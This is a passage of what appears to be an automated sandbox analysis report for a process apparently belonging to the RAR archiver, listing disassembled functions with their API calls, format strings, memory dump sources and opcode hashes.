                                                            • Instruction Fuzzy Hash: 7631A823A0CE8191E620AB15E4017EAE360FB557A0FD04236EA5D176DAEF3CD54ACF20
                                                            Function 00007FF71D2F49F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: LoadString
                                                            • String ID: Adding %-58s
                                                            • API String ID: 2948472770-2059140559
                                                            • Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                            • Instruction ID: 0470aae481fdf52a849e309c9b961ec4a75e47343b57216f045859d54e6cb1ab
                                                            • Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                            • Instruction Fuzzy Hash: 5F114972B1CF41C5EA10AF56AC440A9F7A1BB98FD4B948439CE1C93324FF7CE50A8A54
                                                            Function 00007FF71D2B5DB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: swprintf
                                                            • String ID: ;%%0%du
                                                            • API String ID: 233258989-2249936285
                                                            • Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                            • Instruction ID: 7d43370ee86065d88c36b9e61e70c0c70f5aa0cab77fbf317800a9a58a4468a4
                                                            • Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                            • Instruction Fuzzy Hash: FB11B632A0CA8182E720AB24E0103EAB360FB88754F844131DB8D07795EE7CE54DCF50
                                                            Function 00007FF71D2D331C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF71D2E42CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF71D2E430F
                                                            • GetVolumeInformationW.KERNEL32(?,00007FF71D2D0BED,?,?,00000000,?,?,00007FF71D2CF30F,00000000,00007FF71D2B6380,?,00007FF71D2B2EC8), ref: 00007FF71D2D337E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: InformationVolumeswprintf
                                                            • String ID: FAT$FAT32
                                                            • API String ID: 989755765-1174603449
                                                            • Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                            • Instruction ID: 1880f051f5ae1613de243d5113bbb8a39fb3a7f4197e5524f1ff684751da8a03
                                                            • Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                            • Instruction Fuzzy Hash: 59114232A1CE4281F760AB50E8912E6E355FB94354FC45135E98D82A95FF3CE11DCF24
                                                            Function 00007FF71D2FB974 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ErrorExceptionLastObjectSingleThrowWait
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 564652978-2248577382
                                                            • Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                            • Instruction ID: 0e80b1bcc96b86953e7d3a7e77f03b6266431c77517f088ea868eeb230d1227f
                                                            • Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                            • Instruction Fuzzy Hash: EEE0E531E0CC0292EA40B725AC850A5E251AF547B4FD04335D43E421E1FF2CA94E9B21